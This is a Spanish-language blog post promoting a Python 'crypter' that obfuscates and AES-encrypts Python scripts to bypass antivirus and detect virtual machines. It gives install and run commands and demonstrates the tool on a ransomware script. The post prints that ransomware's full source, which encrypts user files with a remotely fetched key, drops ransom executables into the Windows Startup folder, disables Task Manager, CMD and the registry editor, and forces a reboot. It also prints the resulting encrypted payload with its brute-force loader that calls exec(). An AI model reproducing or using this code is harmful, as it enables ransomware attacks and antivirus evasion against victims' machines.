Crypter en python3

Siguiendo con Python hoy os traigo un interesante y didáctico Crypter escrito en versión 3 por el indio Pushpender. Esta herramienta nos valdrá para ofuscar (base64 x2) y cifrar (AES256) el código fuente de Python para bypassear el antivirus. Además también es capaz de detectar VM como VirtualBox, VMware o Sandboxie mediante tres métodos principales: comprobando el registro, procesos y archivos y la dirección MAC.

Probado en Kali Linux Rolling, Windows 8.1 - Pro y Windows 7 - Ultimate requiere Python 3.X y el módulo Pycryptodome:

$ pip install pycryptodome
        o       
$ python -m pip install pycryptodome

$ git clone https://github.com/Technowlogy-Pushpender/crypter.git && cd crypter

$ python3 Crypter.py deathransom.py 

    Cracking Speed on RunTime
    =========================
    With 2 GB RAM & 1 GHz Proceessor 
    --------------------------------    
    Guess Speed: 2000 Numeric Pass/ Seconds

    Password Like : 10000 is cracked in 5 seconds
    So Delay Time In Program Will be 5 seconds
    
    
[?] Enter Numeric Weak Key : 12345
[?] Enter Path of File : deathransom.py
[?] Want to BypassVM (y/n): y

[*] Making Backup ...
[+] Done !

[*] Initaiting Base64 Encryption Process ...
[+] Operation Completed Successfully!


[*] Initiating AES Encryption Process ...
[+] Process Completed Successfully!

Antes:
from modules import rsa,learn_key
from modules.bypass import anti_debugger,anti_sandbox,anti_vm
from ctypes import *
import os,time,win32api,sys,wget,shutil

try:
    PUBLIC_KEY = learn_key.public_key('https://pastebin.com/raw/FrNX6xHE')
except:
    sys.exit(0)

def anti_disassembly():
    a = 'adsadssadasdsgfaad'
    ab = 'adsadssadasdsasdad'
    ac = 'adsadssadasdsgfad'
    ad = 'adsadssadasadfdsad'
    av = 'adsadssadasdsasdad'
    abx = 'adsadssadasdsagad'
    acx = 'adsadssaadsadasdsad'
    ada = 'adsadssadasdagsad'
    aas = 'adsadsfssadasdsad'
    ae = 'adsadsgsadasdsad'
    ar = 'adfdfsadssadasdsad'

def download_ransom_request():
    try:
        dir_startup = 'C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'.format(os.getenv('username'))
        # Script that will show the ransom request
        wget.download('mediafire.com',out=dir_startup+'ransom_request.exe')
        shutil.copy(dir_startup+'ransom_request.exe','C:\\Users\\{}\\Desktop\\ransom_request.exe'.format(os.getenv('username')))
        # Script that counts the 4 days to delete all files
        wget.download('mediafire.com',out=dir_startup+'time_script.exe')
    except:
        pass

def disable_all():
    try:
        os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
        os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
        os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
        os.system('shutdown /r /f /t 3')
    except:
        os.system('shutdown /r /f /t 3')

def main():
    anti_disassembly()
    if anti_sandbox.check(0,0,1,0,1,1) == True:
        pass
    else:
        print 'sandbox found'
    if anti_debugger.check() == True:
        pass
    else:
        print 'debugger found'
    if anti_vm.check() == True:
        pass
    else:
        print 'debugger found'
    
    username = os.getenv('username')
    path2crypt = 'C:\\Users\\' + username
    valid_extension = [".pl",".7z",".rar",".m4a",".wma",".avi",".wmv",".d3dbsp",".sc2save",".sie",".sum",".bkp",".flv",".js",".raw",".jpeg",".tar",".zip",".tar.gz",".cmd",".key",".DOT",".docm",".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".bmp"]
    enc_files = rsa.files2crypt(path2crypt)
    for file_pnt in enc_files:
        if os.path.basename(file_pnt).endswith(".wannadie"):
            pass
        else:
            extension = os.path.splitext(file_pnt)[1]
            if extension in valid_extension:
                try:
                    rsa.encryptar(str(file_pnt), PUBLIC_KEY)
                except:
                    pass

    with open('C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\delete_ransom.bat'.format(os.getenv('username')),'w') as in_file:
        file_path = os.path.splitext(os.path.abspath(__file__))    
        filename = file_path[0].split('.')[0]
        in_file.write('del /Q /S /F {}'.format(str(file_path[0])+'.exe'))
    download_ransom_request()
    disable_all()

main()

Después:
from Crypto import Random
from Crypto.Cipher import AES
import hashlib
import BypassVM

bypass = BypassVM.BypassVM()
print("[*] Checking VM")
bypass.registry_check()
bypass.processes_and_files_check()
bypass.mac_check()
print("[+] VM Not Detected : )")

class Decryptor:
    def __init__(self, key, file_name):
        self.key = hashlib.sha256(key.encode('utf-8')).digest()
        self.file_name = file_name

    def pad(self, s):
        return s + b"\0" * (AES.block_size - len(s) % AES.block_size)

    def decrypt(self, ciphertext, key):
        iv = ciphertext[:AES.block_size]
        cipher = AES.new(key, AES.MODE_CBC, iv)
        plaintext = cipher.decrypt(ciphertext[AES.block_size:])
        return plaintext.rstrip(b"\0")

    def decrypt_file(self):
        dec = self.decrypt(self.file_name, self.key)
        return dec

class BruteForce:
    def __init__(self, encrypted_codes):
        self.encrypted_codes = encrypted_codes
        self.password = 0

    def start(self): 
        status = True
        while status:
            try:
                print(f"\rPassword : {self.password}", end="")
                test = Decryptor(str(self.password), self.encrypted_codes)
                decrypted_code = test.decrypt_file()
                executable = decrypted_code.decode() 
                status = False
                return executable 
            except UnicodeDecodeError:
                self.password += 1

encrypted_codes = b'\xb2\xb5\xa9\xce`\xe1\x04[\t\xca]\xdcK\xedI\xbf\xc7\x91pb\xbe\x7f#\xb0\x9eFL,\x02.X\xc1\x16\x03-Y\xf5\x9bzr\xde\xee\x14]&R\xa6\xfe\xce^9\x1b\xbcf\x14\xcdR\x90.\xa4\xc8\xfb6L\xa3\\\x1d\xbd\x0b`o\xbc\x1c\r\x87\xe2l\xf8f\x90\x1d||5\xcc\x93\xdd`\xfc\xe4&6\xce\xf9ta \x17\x88`b\xa3x?\x9e3\x08\xbd\xe2w\x92q\x14\xa7\xd67\x94\xb2\x06M\xe3}\xde_\xb6\xa2dt\x9d\xeaq\xab\xc5\x04Mvil\x95"\xead\xf69DZ\x8a\x8d\xa6\xa1_UX\x8f\x8aWS2\xb8\xae\xac\x9e \x82\x9fBw\xf7\x06\x16\x84\xc4>\xebn\x1fgAWy\x1c\xbb\xf2\xbco\x08>\x99\xb2r,\x82IR\xf0.O\x86&\x85u\xbd\xec\xd0\xad\xd2\xc3\xe1\t\x16\xc0\xc24A\x851}\x94\xe96\xd9\x923\x15\xb8\xc5q\x1f\x18\xe9\xd7\xd0\x13\xca\x91\xf1\xb1\x81/\x8bS\'\xc4\xf6\xf2\x96\xb5\x92\x1b\x9f\x04&O\x18FU<!\x82H.n\xc7\x0e\xcd#\xb2\xa84\x87\x8fUTd\x98*\xef\xc7_!\x1c\xeag\x99I\x00\xaa`\x95\xc3\x81\xedi~\xdd7<\xe5\n\xf0t\xbc\x98\x8aY\x17E\xaa\xff\xff\xd7\xce\x04K\xf6[M\xf0sZ\xb8\xf2\x8f\x1bag2\xfe\x15\'\xc2\x0c\x9cn\xa7\xbfV\xef\xa9\x1f^j}\x89\x85\xe9\xca|NoI\xc3\xd6\x04Z\xb1\x9eD\xa5%V8\x00L\x03MaNdq+\xa2\xd9\x97\x1e\x12p\x92(\xec\xcd\xa0y7\xbcE\xed\xb8\x06F\x00>\x11\xa6W-\xa3yj\xaa\x94B\x1eY\xab\x00\x0b"Tw\x9b\x0e\xef\x05\x19H\xd0\xd1\x01\xdc\x11l\x80\xaa\x06\x86tf\x03:\xf5]\xc4\x9a2b\xf8\xcb\xcaT\x0b(l\xe3\'[}/mA\xda\x0c\xcdj\x8f|\x17\xed\x9dk\xe7\x88\xa5\x1a\xf8\x16\xb9[\xf5\xe6ub\xa6\xf1{\xf0\xaa\x97\xf5\xb3\xf0\xe9\x9bl\r.W\x91(Kx\x1d\x97\x94=\xca\x1d\x9d\x07\x89m\xbe\xa7H\xdc:\x086\xa2\xe2\xa8C\x9c\xff\x18U\x84\x10\x0b\x85%\x0f\xf2\xba\\\x94\xfe\xfc\x11e\xb4\x8dA*\xba\xa7u6\xee\xcb\xf16y\xaap\x14\xa7tR\x8e;a\xa2\x1fv\x84\x06\xbb\xffbh\x18\xe5n\xdfp\xad?\xdfj\xdc9\xcaB\x8bS\x12\x87\x1b\x9aoR\xf1_%\xa9v\xfa\xce\x9a\xb8\xbc>\x8ddB\x1fK\xcct1b\xc7+c\xc1\x03{\xfd~\xf3\xdb\x17\x80\x8f\x17Js\xd0\xc1\x0c\xcb\x1a]\xf8iG\x88\xcd=Cj\x8d\xda\x0b{\x9b\xf1L\x12\x04\xf4\x17\xcf\x10\xfe\x83\x01Qq7\x9c\xae\x9fDf\x17\xc8\xf1\x99Cd\xd0m\x83i[?\xaa\xecQ\xaa\xcc\xe5C\x15\xc0\t\xcd\xb7M{\xeb\xabw\xe1\xd0\xb96<<E4\xf4F\x1c\\\x0e,j[\xa36\xa7\xf2\xb0\xec\xf4\x17\x06\xc2r\x1e\x15/\xc6\x071\xe0\xd7)\xed\x8b;\x84\xa7\xdc\x88\xe0\x91T\xf5\x7f;\xf3\x07\xb9\xf0\xc8\x9f\xa5\x12\xa23I\x84\x8e\x01z\x04\xde\xf0c^5\xe4\x82:\xd5\xc1\xbe\xe5[\x9fP\xfc\xe24HjG\xec\xd9l\xc8\x9e\x97.\xc4\x85\xf0\x7f\x02x\x14\xdbx+\xba\x18\x9a\x0c_*LnZK~\xf4\x01\xbf\xbe\xe7\x0b4\xff?\xf7j\x94\x9d\x1af\xf2\\\xd2\xde\x8e\x0e\n0\x87\x96\x1b{\x01\x1f\xfc\xb6\x07\x8e\xf8G\xac\xc4\x15\x83\xea_\xb8_\x01\x14"\xca9\xf7I\xbe"\xf4x I\xec\xe6Kx%I\xd0Os\xd9\x9c\xe1\x90\xc9-\x86\x00\xc7}\xdel\x0f\xf3yk"g\x8d\x1e\xed+\xc3\x83\x8a\x83*ov\xd0\xef\xe0\xa2\x87\xed\xed\x94\xcc{\xec\xe8\x86\xc1\x7f\x05\x08\x04\xbbG\x92tf\x11\xd4\x8f*\xaaT\xf5\x1c/\xbb\xeft\x1e\x98\x11\xd3x#:\xce{I_c\xb9\xed\x99\nZd\xb0\xb0Kg1\xd4(l\x96\x9eV\x07\xbby\xfb\xc5o\xde\xae\x18\x03P\xe7kK\xd1\xb8\x0b\rx\x02f\x0431Ge!\xc2\xe8\xed\xe2(\xbeh\xf5h<\x1f\xc0c\x89{YC\xda\xa8\xe3\xe9J!j\x02\xe1\xbe#7q\x14]\xae;d\x9b\x17\xb6\xc8\xd2v?\x97\xeb~jX\xa7aR\xf1x\xc0N\xc0\x89\x1d\xc8\xa3\xba\xc42!9m\x03x\x7f6=\xeb*gBK5\x97A\x08\xcaot\x9a\xbdM\xbb\xe8\xf0\x84ji\x95;9|\x96\x82\xeat\xe5\x89\xf6\xab\xbd\xadk$\xd1\xb3\xdd\xbb\xb7\xdc\xa7\r\xfe>0\x1a\xaa\xaeQ\x13s\xb0\xae\xca\rX\x8e\xc0a}\xa0t\x8c\xf8\xec\xb9x\xdf{4m\x82\x0f.\xc2Q\xb8~\xbf\x83\x1e\x00\xe7&\xc3\xac\xfd\xcb\x96\xe9\xc3\x94\xb9\x00;\xb3\xd9\xb7J\xe6\x1f\xd7\xe0x\xc9q\xb0\xff\xfd4yXg\xce%\x91R\x9f\x10M\xc1HM}\xe2\xbe\xb4\x8b\x858\xdd*V\xdf\xe3;\x9c\xa9+\xa5\x05\xd1\x08\x07\xe8.-\xb4\x1c\x85/\xf4\xbb\x832\xbd\xbf\x16\xa8)L\x96-\x19\xd6\xfcG*\xf4\xd8(\x17(\xa6z\'\xc7}+\x19\x94\x13\x8bA\x89\x1dt\x977.5]\xd6[\x9b\x97\x02\x88k\xd0\x9ee\xddj\xc2\xc7\xf2U\x8fT\xd0\x047\x81c\x0c\xfe\xdc*|c\xdd\x87\xa0\x02p\xbb\xbe\xbd\xbc9:wg\x01\xd3u\xba\xda:\xcd\\\xd0\r\xfa\xcayH\xc6\x14R\x8f\x07\xbd\xc2\x02P\xe3g|\r\xdfd\xafx\xa9\xfc2\xb6\xd8\x82\xcc\xba\x1aek\x10\xb2\x1d\xf9\x12>\x97\xcf\xef\xcf\xd2mK\xb4\xd6\xc3\xd89\xb7g2\xa3l\xd5\xc9?\x0b\xff\xa15\xa9\xf0%\xa0P\xc49.$%\xb9B\x92\x80\\\xedjLG*\xf8\xd6IJP\xda\x03\xd3\xdfv\xe1\xe9*B\x97s\xfa\xe1\x99\x8duR\xe7\xc9u\xb6\xfbtki\x08}\xac+\xa3\xd9\xc6\xdf\x19\x9fa\xe4&\x8a\x85\xae\xb8\x0fe\xfbb\x82\xd2\xf7\xe1>C*\xb0`\x04\x1b\xdc\x16\xd3U\x19\x1f\xd4\xf9\x8f}\x80c\x92p\x85\xe5\xadd\xfa\x07\x86\x1d}H\xad@\x17\xd3\x0er+\xd0\xdf\x13\xb3\rF]v\xbc\x0c\xd2\x04\xb8\xd5)\x13\x81M\xf9G\x01\xe9N\x03d\xba\x98\xd9q\xb3Bmh\xd0\x9c\xc9c\x08\x9e\x1b\xa5\xcc\xd0(\x12f1\xe4z\x81\xb7\xb0\xee\x9cNAY\xbf\x81\x9cKXx\xdcN\xa3&N\xd0K\x17\xdd\xafh\xd4\xe1\x9e)\xee\xf2\xb2d\xea\x8eLXE\xc2\xee\x03\x941\xb7w\xed\x01;J\x13\xd0\xee\x9d\xd7\x04\x14Z0\xe8\xd7\x9b\xa2|$\xee\x8a\xfa \x13v\x87\xd1\x82\xb7\\\xde\xd8\xc1\xb6s\x10\xb75\x9dwa\x1dH\x8d\x0f\xbb\x9e\xf8|\xdc\x80\xad\xf5\xd8b\x81\xa1w\x13\xd2\xd09UO2\r4\x97\xebe\x96\x12\xba\xc1\xc4pV:\x8b \x1aq\x0c\x88\x05\xbc+|\xe8Hy-\xf2\xf1y\x81\\/H\x0fbDX\xa9x\xbf~JF\x04\xe1\xf3.\xac\x1e\xaeW[\xcf\x19\xaby?=\xdet\xd0g\xd0\xdd\xa0\x89Ex\x17\'\x16\x81*\xeb\x94\xf7\x95P\xa7d\xb7\xb8\xd1g\xa3j6;J\xc1\xe3iHQ\xb5o\xab\x8bR:\xb1P\xd4\xebW\xce\xa0K\xb7\xdd[)\x10\xaf\x85\xfbfc\xe0H\xc8V2O\xc4}\xfc\xc0^9oY>\xdf\xe9X9\xda{\x82lUa\x1d\x7fyXz\xac\xbep\x99\xd7\xb2g\x1f\xb9\x0f\xed\x0e\xb6\xad\xbb\xf6\xdf<\x0c\r\xd1\xaf\xb5-1\x87#>!F\x85-S\xfb/n[\xf5\x96\xd9\x88\xbd\x96\xb0\t*\x842#(\xe8\xd5\xc5\x0c\x92\x0b\xcd\x83\x01\xdar~\xf6\x8b\xb6\xf0\xf8f"(\xc8\x14\xfe\xb1TG\x9a\x01\xf5\xa4\xea\xaa\xe1\x8ec\x1aL\x9a\xa7oU\x0b\xf3\xe5eY\x99>\xab\xe5q]\xf4\xb6i>\x98"\xaf\xe8q\xf6\xbf\x95\x00`2N\xe7\xb6\xff \x90;\xf4\x13"q\xbcmd\xa5\xc6\x0b\xe9v\x89\x1e\xdb9z\xa0\x1c\x92\x01j\x13\x97"6\xd704;\x87"\xd0\x16=\x12?\xc1\xb583)<jm\xe1c\xd2\xc3\xd4\x88t<\x89\x94g{\x13\xe3\x88\x9d\xda\xe4\n|d\x9a\x08\xcf\x1b5K\xea\xc8\xfb:\xdeo\xd4\xaa\xe6\xa1\xac\xe8\x90\xad~>H#\xd3<N\xfc\x0e\x145"\x1f\xe9!a\x10X\xc9\x12\xb3\ni\xdd\x88P\x99\xa9\xcf\x0f\xf1\x07\xcc\x11\'F\x7f\x0b\xcf\xff\xfe\x87\xce\xbe\'\x0f&T\xe9\xa6\xc1e\x03XA[9M\xd4\x0c\x8f\x18\x95(\xd5\xf7[e\xe5\xa0n\x14D\x183\x05+\xf5\xd0\xe6\xa7\x89q\xdf\xdc\xaf\x00\xcc\x83\n<\x05\x13<\xb0\xc64\x15\x83\xfbT`\xdd\xb6}\xbf\x9a\x96LF\x98\xea\x9d!h\xb5\xaf_\x8cA\xcf\x1b-\x13\xe4d\x9b\x9a\xa8q3\xc8\x8b\x9a\xde$a\xd6i\x0fL\x94\xa8#ks\xa8\xc3s\x04C\xf3p\xa6s+L\xde\xd9\x15\xcb\xda*\xaf\xe5\xf0V2\x01\xf6\xe8\x8a1\xbbg\xa7\xd9E\xae\x8b\x9c\xa9`\x99g\xa7\x15\xb9r:\xbd\x11\x17\'\x13\x82\x05\xbf+\xb3o~2\xd5hz\xdb\x03\xd4ea\xc6\x81\x07X\x0c\x9f\x1b\x96\x1f\x83`\x15\xc8\xfc\xc9\x1ds\xc2A\x16q\xc6|a\xe2\xb7GpM\xad\xa6\x99H\x80;O\xe1\xe3\xc0\x0b\xa2~\xea\xe7\xc4^\x02\xc4$\xea\xf1~\xdf\x855\x90\x97\xfb\x96\x15\xc6\xe5s\xe9\x83 \x08\t\r\x12\xd1\xe3\xc2\x92\xa0\xe0(\rM\xa7\x1c\xa6*\x80ik\xeeQ\xe1\x96WE\x18\xd9iD\x18\xfb\x1a\x9b\xe0\xe7\xcc\xcc\xcdU\xe1)$t\xd2F\x86\xf4\xd4\xaa%\xb2X\x15\x97\x14L+\xd5)\xf4\xa1\x1a/p\x00j[\x18v\xda\rw\x04\x92\xc2\xc1\xe9\x84\x8a(\xce\x18\xc0\xb1\x89O\xb1\x8c\xbf\x86\x8a|\x1b\xf8\x1b\xd9g\x1d%\xc4\x14\xfdA:b\xde*\xc9\xf3\xe2\x9fs\xc5"!P+J\xb7RVd\xc3\xca\x86\xd4\xa6\xe1\xbe\xeeoDS\xf4\x7f\x03\xb8\xa0\xfa$\xc0k\x1c\x12\xc1\x9fcG\xfc\x91\xf1\xf9y\xe41\x98^\xaf\xce\x11\x92\x9a\xefh\xbe\xbbIH\xd0rO\x1f\xab\\r\xed\x1eb\xcf\tQy"\xa7\x06\x84\x16\xbf\x1b\xa4\xc0\x19%\xde\xc4\xd5\xb3\x99)U!\x9d\x86^8\xa3\xcb\xdd\xe7\x0eW\xe9\x0b\x1dM\xc3\xa81\xc9\x84\xbeA\xfc,\x90\xa6\x7f\xb6&\x88!"\xc8\x9b\xf5\xfe8K\x7f\x16\xe38\xfb\x03\xcdng}6\x89{\xa2\xf2\xf5\'t<Z*\x13\xf8\xc5\xe6\xcc\xbcr[I[\xca\x0e\xa4\xf0Y\x12\x03\xd8\xf7\x92\xcc\x9a\\E\xd4\xdf\ru\x83q}\xddj\xe5\xda;\xef\xc0\xdc[\xa5\xe7\x06\x84?r\xbf\xe5\x13o\xdb\xb9s\x05k\xaeXb\xff59i\x8cC\x89"\x99\xcc\xc5fJ\xef\xa4\xe8L\xe4\xe4o6<q!\x8f\xda\\?\x98L9\xce\x12Sd\t\xb3\x97WR\xcc2}\x89\x7fV9\x7f\xc8\xa3\x02\x99\x1d\xb5\xdb\xe8i\xc8\xfdj\xdf\x169\x0b\n\x91!\xfen\xde\x83`\xd7ce\xb4~\t\x1b\xbe\x87\x0bHG\xda\xdcc\xc9\x99y\xb8\n\x98\n>1\x00\x1e\x01\xf6\n\xce\x18G\xf1C\xed>\xe8\xa4\x989\xe3\xd8\xfd\xd4\xf9\x89\xce+?\x90YH\xf2v\xf5^_\xe1\xc0\xc6Q\x1b\x0e@\xf7\x08\xda\xb6T\xe5T{\xca\xfe\x8a\x96\xdb\x05\x02\x05\xec\xe5x\xae\xbd\x82\x9f\xe5t\xbeV\xc3\x06\xb1\x0f\x0c\x8a~$f\x07\xb3\xaf\xf7*\xf4\xfd\xed\xf6n\x04\xd5\xbf\xb2\rmJ\x11\xd0\x97\xfb\xd9L\x1c\x07&\xabF\x86\x03\xfc\xc4[\x8d}\x9e\xc9\xcf\xe3fI+\x028j\xa9\xbe\xb1\xe9\xd0q\xaf;\x07\x14\xfe\xa8\x91`\xf8\xb2\xf0\xa9\xdd\xca\xee\n\xa8]3Z\xdaN\xa4A^!\xfaq\x1d\x99\x1b\x15\x90\x01w\xe7\xd6\x02i\xc5\xd1\x92\xe0\x9bd\xf2&Ap\xf9\xefid\x08$\x8b\x97J\xd7\x97C?\x1a\xc3\xa4\x08Y\x95&U\xed\x0f\xb6\xd5\xbb \x0erNkm\xf7s\xa5\xf3slKt.\xd1;x\xd8\x11Z\xaf\x87XZ\x82\x18s\x9c\xd6\x95\t{,\xecw\xb8\'x4\xd3\xb2\x84t\xbc\xb6`H\x8e\x10\xd2\xf5u\x89\xbc\x1c\xcb\xc7\xdc\xc8\x92\x03\xa7\x18#e\x86\x95\x90\xd3\xd6\xa5j\xdf\x04i\x8f\xf0^$\xf03\xc9\x1e\x0c\xaa\x9f\x9e\xa7;<Z\xfdp^R\x18V[7\xecGOp\x96\xe0\xbcc\xd53\xa5\xd7\xd2\xa1<*\x9f\xdc\xa3D\x7fdQG\xd3pa&\x8c\xe0\x8af\xb8\xc2\x83\xdd\xb2\x7f\x9cMP\xaa\x16\xa0>\xd8\x85\xed\x1c\x85:\x82c\x16\xf6\x18\xc7\xb9\xb6a\xcc\xd0b_\x03\xca\xcc_/\xf8\x81\x95\xe8q\xc3\t||\xac\x8d\xe1\x1d.\xcf\xcdAB\xaaXLG/\xbc&wC\xc5%Un\t\xc1\x03\xc7\xdf\x05-\x1dx\xa6\x16y\xaeM\x9f8^DG\xa1i\xfdF\x87\xc0\xe0x\x7f\xd1\xff"\xd6\xb56+\x92\x99u\xa3\xde\x02\xc3C\x00\xcf/AE4m\xcb(K4\xa3V#\xdbS\xb7\xdd\xcb\n\xb9\xac4<\xd3\xab1\xf6\xb9\xe7\x15\x99\xa9\x91v6\x8a\x80\xde?Y{^\x1fg\xb6\xcd\xf7\xd4\xfeQ%@\x18*\x1c\xb7\xb9\x1a<\xad\x81>\xbe\xfd\rJ\xd9VG9\x905\xa8\xf68>\xd1\x0c\xd7\xe7\xcc\x12\xa8j\xda\x02)\xde"\xe7\xe8Y7\x86^3\xc0\xcfv7\xc3\xaf\x04"aI\x99\x17\xd2,Q\x1ed\x11\xb9y\xeen\xf8y\x01c\xbedY\xff\x04\xc7B3Mu\xc7\x96\xc6G\x8fE\xba{\xe2\xf7h\xc0\xf5E\x9d\xbfJ\xe4$\x19?Jj\x92\xc5\xde%\xc8\xc0\xed\xc8\xcd\x99`\x1eR.\x9a\xd8\x8e\xb4[(\xdb5\xc3\xcf#\x89\xb1V\xe6\xb1\xc6\x19o\xfb\xb9\x84\t\x19^\xe7K\x0b~\x1d\x1aU\xb0\x0f\xf6(m\xbb\x1e\xa0\xf8S\xe7r(\x92+<\x90\x12VIVo\xf2b\xa7\x9e\xa8\xbd\xf1\x03@=\xb9n\x91\xde\x949\xa2\x9b\x99\xfa\xaem\xbb<3\xb1281\x95\xff\xed\xcf\xec\x90\xf2\xba\x8c\xaf\xf3\x16\xbbw\xfe\x19\xe0\xb0<5Y\xa3\x04BG)e\xb3E/4\xa4\xb7Y2\x98\xd5\x0f\x14RdIX\xb2\x18\x19\x8a4KI\xf4#!\x8ebD\x860\x01\xc9\xe3:\xb6\x06\x12\x0c\x8b\xbc"\x17\x17\x0fu\x0c$\x1e\xe0\xee,rrI\x93\xc4\xa5\x05\xc4q[\xbb\xb5\x1c\x01\xdc\xde\x87\xf3\xcej\xa1_s\x86\xcc\xe9\xcc\x88\x0c\xbc\r\xbaS\x7fz\x1am\x18\x86\x17\x12\xe7\x87\x1e\xb8^A\xa5\x12\x1a\xae\xd9\xe9\xf75"\xe8\x7fI|C\xec\x8e\xb6\xce4c\xdaM@\xa5Q\xa2\x8dc\x1b\xa8\x03\x87\xe4\xa53\x8e\xcc\xccN:\x008\x83\xf8\xa2F-\'=_\n\x02\xcc\x04\x7f\x8b\x95\xdb\x18@1\xc1b@\x99\xb7\x08\r\xf1\'\xb6\x8b\xb6\xea\xc5\xd5\xc6GLdO\x91-\x1bi\x8b\xa4>\xbek\x8dd\xad\xaa\x0f\xf9\xe0\xbe\x0ffh\x85\x8cy\xc1\xa5s5\xbd\xdc\xd1,I+\xca\xa1_C=\xa3\x0c\xed\xaa\xc7\xf8]2\x0eYy\x91*}G\xe8O\x95i\xb4\x80\x14\x97\xd9\xdaK\xce"\xd1\xe8\xd4\xc9m\x9c!\xc2\xe0Q\\z$\xb5t\xa2M\xd1\xc6\x8c\x07\xf1v\xde\x18.\x9a/\xa7W\xf9K\xae\x1d\xf3\xb5\xacd\xealp\n5Zd\x08\xf4\xca{\x9dp\x8c\xee\xf4\xa6S\x11\x98\xb7\xce\x89(\xc0\xfa\x07w_\xbf\x16\x0f\x82\xc5X\xbc\xf9u\t?\xbe\xc5\xaa3\xd7\x9e\xf1YM\x8fr`)\x92\xe4\xb4\x163\x87\xfc\xdd\x8e\xcb\xff O\xc3\x17@\x0c;A\x10\xfd\xc8\xd1u\x14l[\x19\x11&\xb0u\xd6j\x92\x12\xec<h\x10JV\x1d\x90\xb3\xc7\xc2U\xe6\x06\xe4\x16\x1d\xbfEa*\xb69\x82,\xea\x83\xc3k\xc5\xc3^Ayh}\xa6\xe2\x04l\x0cB\xe3\xa2\x8b@6\xa3Q\xad\x01\x98\xb8\xe0\x15\xe0\xb0\xceD\x01k\xfd8\xb6!#\xa1R\x9a^J\x9c\x85\x8a\x9c\x80\xe3\x92\xc6^\xa4kBOP\xbc\xfc5#w\xf1\x91y\xd92S \xf8"y\xebv\x05\xe1C\xbfM\xdb\x82X\x97t\xbd\xfc\xd2\xf3\x9b\x9d\x9f\x10\x9d"5\x19\xfa\x83\'\r\xd5CK\xa2\x00\xf4K\xa1#\x14\xb3\xffJ=\x8a\xee\xb1\x08)\x9c7l3\xfa;P\xca\xac\xd4I\x1f\x0f\x9f4m1n\x83\xbf\xa8\x1d\xe0\x9f\xc6\xf4Djsi\xd1\xf1\xbdY\x00S\x19\x91\x8f>\x8eq\xb4n\xc2#qss\x93S\xfd\xff\x15\xf5\xdb%\xb5\xf7\x14\xf7MF\xdd^-V\xf9\x98{\xf2\x14ir0Q"\x0f\xdd\xd1\xe50O\x86\xd1`\x1bD\'\xea8\x88=\x02\xa5\xdfS\xea\x98\xba\x90\x87a\xf2\xf9\x95\xa92v3\xe9h\x1b\x98vv\n\x80\x99\xb4iHA\x01\xafa\xdd<u"\xf2\x87\x92\xd4\xda\xc1\xbe\x90&\x81Na\xd7\xfbC\xb5&\x18\xdc\x03\xad\x96\x14\x02U\xe9\x851\x82}\xe2\xf8\x11=\xa1\xa9\x85poNT\x0e\x97G\xe8{\x13X\xed\x04\x80\x1e"\xd1F\x92\xeej\x0e\xc2\xd7\xfa\'\xf8c\xca\xfc8\xc5z\xe8\xacR\xd0\xf6t\x12L\xae\x9c\xa8\xbc\x8c\x8b\x96\xc1*U\xc92\xcd\x8c\x02\xf9\x95\x05\xcc\xd5\xe2("c\xa9\x9b\xca\xbc*\xe2\xefB\x17\x05\xc6\xc8\x88\xb7\xd7hm\\\x90\xe6\xe3(\xa2(<\x92;F\xce\xa6y\r\x89\x86\xfb\x17\xacw\x0bn\x0f\x92\xb6\x19\xe7{\x91I\xad\x07\xa8\xdbt\xf3\xa5\xfa\xcf\x87\xe29.F\x0c\x97\xb7\x82\x18lS\xa2\xbe,)\x85\x8b\xa2\x07\x97g\xce\xbc\xba\x85m\xaf-\xef=\xf6\x9bP}\xb8\x9e\xb2\x0e\x827\x86x\xa1`\x068\x195.\x9e\x88\xa4\xeb\xd4d.\x9d_\r[f\t\xf8\xfck.\xd0\x07\xc1&\x9a\xabA\xad\x9bP\xa3?\xd61(q\xcd\xe2\x88\xc0\xa1L\xd2\xc2t\x086)}%\x84\x85\xb4ZW\x95\xe6\xcew\xa3\xf9\xc8D\xa7J\xf9/\xbfM\xa1\xf0Q\'\xa0\xdd\xb3\xa9\xc2\xda\xa0\t\xa52\xd7\xed\x1b\x8a\xc1\xbb\x9b\xd3\xf3\x971~\xfa9\x15a}\xe4\xba\x0ct\xd9\xafg\xecQ\x9c\xa3\xe9\x15\xb6\x90+9\xc6`<\x0f\xd9\x95\xae\x8c|B\xa9?\x19FT5\xd4%T\n\x82\x9b\x1e\xb7jj/\xf8e\xdb\xb1pO\x16\x19\xe9\x15\xf4\xef\xe5\x9bX\x17/\x11\xff\xb2[\xa63\x8bG\xd5\'@\x03\x87EJ\xb4\xb1@7]\x007\xb1Q\xcd\xd7i\xa5\xe9\xeb\x95\x92\xfa\xc8\x00\xe6\x91\xfat&S=\xef\xa8\xcbrZ\xe2Q\xd2\xc0\xdc&\xd5\xd8\xea3\xca\xd2"CC\xa2\x939\n\x1d\x8aO'
brute = BruteForce(encrypted_codes)
executable = brute.start()
exec(executable)

Proyecto: https://github.com/Technowlogy-Pushpender/crypter

0 comentarios :

Publicar un comentario